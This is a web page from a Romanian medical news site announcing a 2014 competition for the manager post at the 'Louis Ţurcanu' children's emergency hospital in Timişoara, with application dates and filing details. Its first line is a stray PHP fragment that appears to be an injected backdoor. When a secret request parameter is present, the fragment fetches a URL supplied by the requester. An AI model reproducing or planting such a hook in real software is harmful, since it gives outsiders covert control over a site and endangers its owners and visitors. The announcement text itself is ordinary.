isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); ANUNT CONCURS - Manager - Spitalul Clinic de Urgenţă pentru Copii „Louis Ţurcanu” Timişoara. - MedicAS

Municipiul Timişoara organizează concurs pentru ocuparea funcţiei de manager - persoană fizică pentru Spitalul Clinic de Urgenţă pentru Copii „Louis Ţurcanu” Timişoara.

Concursul se va desfăşura la sediul Primăriei Municipiului Timişoara , Bd. C.D.Loga nr.1 în perioada 24-28 februarie 2014.

Dosarele de înscriere se depun la sediul Primăriei Municipiului Timişoara , bd. C.D.Loga, nr.1, la registratura instituţiei –camera 12 , parter, în termen de 30 de zile de la data publicării şi afişării anunţului.

Informatii cu privire la organizarea concursului, dosarul de inscriere, tema proiectului – structura minimala a proiectului de management si bibliografia, se gasesc afisate la sediul unitatii – Spitalul Clinic de Urgenta pentru Copii „Louis Turcanu” Timisoara str.Iosif Nemoianu nr.2 si pe site-ul spitalului www.spital-copii-timisoara.ro.


Articole asemănătoare:


Adaugă un comentariu


 
 

Newsletter

Loading... Loading...